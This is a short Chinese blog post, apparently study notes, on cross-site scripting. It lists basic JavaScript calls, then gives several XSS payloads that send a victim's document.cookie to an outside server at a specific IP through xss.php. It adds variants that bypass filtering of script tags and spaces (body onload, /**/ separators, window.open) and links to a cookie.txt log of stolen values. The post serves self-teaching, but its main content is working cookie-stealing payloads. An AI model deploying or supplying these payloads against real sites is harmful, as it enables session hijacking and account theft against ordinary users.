XSS远程执行漏洞

24 年 1 月 17 日 星期三
116 字
1 分钟

XSS远程执行漏洞

常用js语句

text

document.cookie				用于js获取当前网页的cookie值
window.location.href			 用于获取当前页面地址链接
window.location.href='www.baidu.com'	  用于相当于跳转地址

常用playload:

text
<script>window.location.href='http://[ip]/xss.php?cookie='+document.cookie</script>

我直接买了一个服务器并且开放了读写权限可以拿来实验XSS

text
相关的ip和playload
<script>window.location.href='http://106.53.207.220/xss.php?cookie='+document.cookie</script>


回显请看
http://106.53.207.220/cookie.txt

绕过

  • 过滤script标签
text
<body onload="document.location.href='http://106.53.207.220/xss.php?xss='+document.cookie"></body>
  • 过滤空格(使用tab、/**/来绕过)
text
<body/**/onload="document.location.href='http://106.53.207.220/xss.php?xss='+document.cookie"></body>
  • 其他可行的playload
text
<body/**/onload="document.location.href='http://106.53.207.220/x.php?x='+document.cookie"></body>

<body/onload="window.open('http://106.53.207.220/x.php?x='+document.cookie)"></body>

文章标题:XSS远程执行漏洞

文章作者:huarui

文章链接:https://54huarui.online/posts/xss[复制]

最后修改时间:


商业转载请联系站长获得授权,非商业转载请注明本文出处及文章链接,您可以自由地在任何媒体以任何形式复制和分发作品,也可以修改和创作,但是分发衍生作品时必须采用相同的许可协议。
本文采用CC BY-NC-SA 4.0进行许可。